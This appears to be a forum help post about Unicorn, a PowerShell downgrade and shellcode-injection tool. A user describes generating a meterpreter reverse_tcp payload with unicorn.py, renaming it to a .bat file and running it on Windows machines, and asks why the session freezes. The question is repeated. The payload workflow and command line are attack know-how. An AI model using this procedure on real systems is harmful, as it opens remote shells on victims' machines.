Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
I change the .txt to a .bat file then run the resource file within my Linux system. When I run the .bat on my windows 7 and 10 machines the .bat open a cmd window a second later it closes automatically. On my Linux PC, I get the normal statements as if a session were to open but then it freezes up.
[] sending encoded stage
[] session 1 opened
[*] encoded stage with x86/shikata_ga_nai
After this is freezes and no session is opened. Is there something on my end that is done wrong
I run the sudo ./unicorn.py windows/meterpreter/reverse_tcp(HTTP) IP port, then I generate that and copy the .txt file onto a flash drive and I run the resource file. Then on my windows PC, the open up the .txt in notepad and do save as and change it to a .bat file.
I change the .txt to a .bat file then run the resource file within my Linux system. When I run the .bat on my windows 7 and 10 machines the .bat open a cmd window a second later it closes automatically. On my Linux PC, I get the normal statements as if a session were to open but then it freezes up. [] sending encoded stage [] session 1 opened [*] encoded stage with x86/shikata_ga_nai
After this is freezes and no session is opened. Is there something on my end that is done wrong I run the sudo ./unicorn.py windows/meterpreter/reverse_tcp(HTTP) IP port, then I generate that and copy the .txt file onto a flash drive and I run the resource file. Then on my windows PC, the open up the .txt in notepad and do save as and change it to a .bat file.